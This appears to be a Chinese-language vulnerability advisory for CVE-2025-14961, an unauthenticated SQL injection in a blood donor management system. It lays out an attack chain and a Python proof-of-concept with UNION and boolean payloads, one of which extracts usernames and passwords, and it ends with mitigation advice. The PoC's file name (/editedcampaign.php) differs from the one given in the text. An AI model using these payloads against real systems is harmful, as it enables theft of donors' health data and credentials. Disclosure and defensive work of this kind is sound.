CVE-2025-14961 Simple Blood Donor Management System SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14961

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Simple Blood Donor Management System 1.0

漏洞概述

CVE-2025-14961是code-projects团队开发的Simple Blood Donor Management System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/edittedcampaign.php文件中，对campaignname参数的处理存在严重的输入验证缺陷。攻击者可以通过构造恶意的SQL语句片段，在未经认证的情况下远程利用此漏洞，成功利用后可获取数据库中的敏感信息，包括献血者个人信息、血液类型数据、医疗记录等。由于该系统用于管理血液捐献相关数据，泄露的信息可能涉及用户健康隐私，具有较高的安全风险。漏洞已被标记为可利用，CVSS评分7.3，属于高危级别，攻击复杂度低且无需特殊权限或用户交互即可实施攻击。

技术细节

该SQL注入漏洞源于/edittedcampaign.php文件对用户输入的campaignname参数缺乏充分的输入过滤和参数化查询处理。攻击者可以在HTTP请求中通过campaignname参数注入任意SQL代码片段，数据库查询语句可能被篡改。成功利用后，攻击者能够执行以下操作：1）通过UNION SELECT语句提取数据库中的敏感数据，如用户表中的账号密码信息；2）使用布尔盲注或时间盲注技术逐步获取数据库内容；3）修改或删除数据库记录，影响系统正常运行；4）在某些配置下可能实现操作系统命令执行。由于该参数在后台处理中直接拼接到SQL查询语句中，且未使用预编译语句或输入转义机制，导致注入攻击成为可能。攻击者无需认证即可发起攻击，通过构造特定的请求载荷即可实现数据窃取或进一步渗透。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的Simple Blood Donor Management System 1.0，并定位到/edittedcampaign.php文件

STEP 2

步骤2：漏洞探测

通过在campaignname参数中注入单引号'测试是否产生SQL错误，确认SQL注入漏洞存在

STEP 3

步骤3：注入类型判断

使用布尔盲注或联合查询测试，确定注入类型并验证数据库响应

STEP 4

步骤4：数据提取

通过UNION SELECT或盲注技术提取数据库中的敏感信息，包括用户表、血液记录等数据

STEP 5

步骤5：权限提升

根据数据库配置，可能进一步获取管理员权限或系统级访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-14961 SQL Injection PoC
# Target: Simple Blood Donor Management System 1.0
# File: /editedcampaign.php
# Parameter: campaignname

import requests
import sys

target_url = "http://target-site.com/editedcampaign.php"

# Basic SQL Injection PoC - Boolean Based
payload_blind = "' OR 1=1 ---"
payload_union = "' UNION SELECT NULL,NULL,version() ---"

def test_blind_injection(url, param_name):
    """Test for boolean-based blind SQL injection"""
    data = {param_name: payload_blind}
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Potential SQL injection detected with payload: {payload_blind}")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

def test_union_injection(url, param_name):
    """Test for UNION-based SQL injection to extract data"""
    data = {param_name: payload_union}
    try:
        response = requests.post(url, data=data, timeout=10)
        if '5.' in response.text or 'MariaDB' in response.text:
            print(f"[+] Database version exposed via UNION injection")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
    return False

def extract_data(url, param_name):
    """Extract sensitive data using UNION injection"""
    # Extract database name
    payload_db = "' UNION SELECT NULL,database() ---"
    # Extract users table data
    payload_users = "' UNION SELECT NULL,CONCAT(username,':',password) FROM users ---"
    print("[*] Extracting database information...")
    # Additional exploitation steps would go here

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    print(f"[*] Testing target: {target_url}")
    test_blind_injection(target_url, "campaignname")
    test_union_injection(target_url, "campaignname")

影响范围

Simple Blood Donor Management System 1.0

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：1）暂时禁用/edittedcampaign.php文件或限制其访问；2）通过Web应用防火墙规则暂时阻断对campaignname参数的异常请求；3）加强对数据库账户的权限限制，移除不必要的数据库写权限；4）启用数据库查询日志监控，及时发现异常SQL执行行为；5）考虑部署入侵检测系统监控潜在的SQL注入攻击特征。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14961
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14961
3 Details https://www.cvedetails.com/cve/CVE-2025-14961/
4 VulDB https://vuldb.com/cve/CVE-2025-14961
5 Link https://code-projects.org/
6 Link https://github.com/lei-loveling/CVE/issues/2
7 Link https://vuldb.com/?ctiid.337597
8 Link https://vuldb.com/?id.337597
9 Link https://vuldb.com/?submit.717584